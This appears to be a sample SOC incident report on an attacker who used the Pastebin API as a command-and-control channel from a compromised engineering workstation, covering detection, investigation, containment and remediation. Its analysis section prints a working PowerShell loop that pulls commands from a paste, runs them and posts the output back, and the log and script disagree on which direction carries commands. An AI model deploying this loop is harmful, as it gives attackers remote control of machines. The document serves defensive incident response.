Zscaler Alert Details
Alert ID: ZSCALER-WEB-SERVICE-1102-7842 Alert Time: 2024-03-01 14:15:33 EST Severity: HIGH (85/100) Source: Zscaler Internet Access (ZIA) Rule: “C2 Communication via Legitimate Web Service – Pastebin” MITRE ATT&CK: T1102.002 – Web Service: Bidirectional Communication
Alert Details:
Detection: Internal host communicating with Pastebin in anomalous pattern
User: alexchen@company.com (Alex Chen, Engineer) Source IP: 192.168.45.78 (ENG-WS-045) Destination: https://pastebin.com/api/api_post.php Time: 14:00-14:15 EST
API Calls:
14:00:22 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=whoami”)
14:02:45 – GET from /raw/AbCdEfGh (response: “user=engineering\alexchen”)
14:05:12 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=dir C:”)
14:07:38 – GET from /raw/XyZ12345 (response: directory listing)
14:10:15 – POST to /api/api_post.php (data: “session=7a8b9c0d&cmd=exit”)
14:12:30 – GET from /raw/AbCdEfGh (response: “ok”)
Detection Logic:
Pastebin is legitimate service (used for code sharing)
Unusual pattern: POST then GET cycles (command and response)
Content contains system commands (whoami, dir)
User alexchen has no history of using Pastebin for work
Pattern matches C2 using legitimate web service
Threat Intelligence:
Pastebin abused by multiple malware families for C2
Commands encoded in API calls
Responses stored as raw pastes
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Zscaler alert
Zscaler Admin Console
Confirmed Pastebin C2 pattern
2. Process Investigation
Identify process on endpoint
CrowdStrike Falcon
powershell.exe making Pastebin API calls
3. Script Analysis
Extract PowerShell script
CrowdStrike Live Response
Script using Pastebin for C2 communication
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. C2 Blocking
Block Pastebin API access
Zscaler, Palo Alto
Pastebin API restricted (allowlist only)
6. Malware Removal
Clean infected host
CrowdStrike Live Response
PowerShell script removed; host reimaged
Jira Incident Report
Ticket: SOC-2024-152 Summary: T1102 – C2 Communication via Pastebin API Status: RESOLVED Resolution: MALICIOUS – C2 Channel Disrupted Priority: P2 – MEDIUM Labels: T1102, web-service, pastebin, c2, zscaler, compromised-account Components: Network-Security, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Zscaler Internet Access.
Alert: “C2 Communication via Legitimate Web Service – Pastebin”.
User: alexchen@company.com (Engineering Department).
Host: ENG-WS-045.
Service: Pastebin API.
Time: 2024-03-01 14:15 EST.
Technique: MITRE ATT&CK T1102.002 – Web Service: Bidirectional Communication.
2. Technical Analysis:
Attack Chain:
13:30 – alexchen account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
13:50 – Attacker deploys PowerShell script using Pastebin for C2
14:00-14:12 – C2 communication via Pastebin API
14:15 – Zscaler detects
C2 Mechanism:
POST to API: Send commands to C2 (encoded in paste content)
GET from raw: Retrieve command responses
Paste IDs: Generated dynamically (AbCdEfGh, XyZ12345)
Frequency: Commands every 2-3 minutes
PowerShell Script:
$c2 = “https://pastebin.com/api/api_post.php”
$api_key = “your_api_key_here”
while($true) {
# Check for commands
$cmd_paste = Invoke-RestMethod -Uri “https://pastebin.com/raw/AbCdEfGh”
if ($cmd_paste -ne $last_cmd) {
$result = Invoke-Expression $cmd_paste 2>&1 | Out-String
$encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($result))
$body = @{
api_option = “paste”
api_user_key = “”
api_paste_private = “2”
api_paste_name = “response”
api_paste_code = $encoded
api_dev_key = $api_key
}
Invoke-RestMethod -Uri $c2 -Method POST -Body $body
$last_cmd = $cmd_paste
}
Start-Sleep -Seconds 120
}
Commands Executed:
whoami (discovered user)
dir C:\ (listed files)
ipconfig (network info)
netstat (connections)
exit (terminated)
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
13:50 – Script deployed
14:00-14:12 – C2 communication
14:15 – Zscaler alert
14:17 – SOC investigates
14:18 – Host isolated
14:20 – Pastebin API blocked
Indicators of Compromise (IoCs):
Network:
– Pastebin API (api_post.php)
– Paste IDs: AbCdEfGh, XyZ12345 (now expired)
Host:
– C:\Users\alexchen\c2.ps1 (SHA256: a1b2c3d4…)
Account:
– alexchen (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked Pastebin API access via Zscaler (allowlist only).
Deleted PowerShell script.
Disabled alexchen account.
Reset password.
Host Remediation:
Reimaged host.
User Remediation:
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User account compromised, leading to malware deployment using legitimate web service.
Contributing Factors:
No MFA on account.
RDP allowed from internet.
Pastebin allowed (abused for C2).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: System information only (no sensitive data).
7. Remediation & Prevention:
Completed Actions:
C2 channel disrupted.
Malware removed.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Restricted Pastebin API to approved users only.
Enhanced monitoring for web service abuse.
8. Conclusion:
An attacker used a compromised engineering account to deploy a PowerShell script that used Pastebin API for C2 communication, evading detection by using a legitimate service. Zscaler detected the anomalous pattern and enabled rapid containment.
Closure Rationale: C2 disrupted; malware removed; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-01 15:30 EST